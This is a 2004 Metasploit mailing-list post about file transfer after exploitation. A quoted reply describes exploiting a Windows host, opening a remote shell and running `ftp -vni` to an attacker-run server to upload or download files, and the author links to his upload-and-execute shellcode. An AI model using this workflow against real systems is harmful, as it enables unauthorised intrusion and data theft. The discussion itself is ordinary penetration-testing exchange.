Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Metasploit pen testing questions

From: guyincognito2 at bk.ru (Guy Incognito)
Date: Tue, 16 Nov 2004 14:20:53 +0100
Hello Phyo,

Tuesday, November 16, 2004, 2:10:50 PM, you wrote:

maybe you can also use my upload and executing shellcode

http://www.delikon.de/codes/upolad-exec-shellcode.c.txt

the framework includes also such a asm code , i know it cause i ripped
the most parts of it ;)

best regards, delikon

PAL> On Wednesday 10 November 2004 16:38, Regence 21 wrote:


On Win2k I can get a reverse shell easily and execute commands, but if
I try and start the Windows command line ftp client won't work (the
command line just sits there after I enter ftp). Am I missing
something? Without ftp, what is the easiest way to upload a file to a
Win2k target host?

 


PAL> I got that problem too . but i got a way around. when u dropped into the 
PAL> shell , start the ftp with this option. eg `ftp -vni 192.168.1.2` .  it 
PAL> will directly login to the  ftpserver (if u have one on 192.168.1.2) . 
PAL> By that way u can download and upload files. Just normal `ftp host:port` 
PAL> do not work well in cygwin enviroment with   WindowsXP. u can issue 
PAL> commands but there is no echo returned.u need to turn on -vni options to 
PAL> work. It works well on linux Tho. I have tried with Filezilla on my XP box.

PAL> I do like this


PAL> Setup Filezilla server on my Box
PAL> Exploit with Metasploit and
PAL> Drop into Remote shell
PAL> Change to directory that i wanna upload files.
PAL> start ftp with
PAL> `ftp -vni 192.168.1.2`
PAL> enter FTP User Pass on Prompt
PAL> Then put / get files to or from the exploited machine.
PAL> Done.



-- 
Best regards,
 Guy                            mailto:guyincognito2 at bk.ru
Previous By Date Next
Previous By Thread Next

Current thread: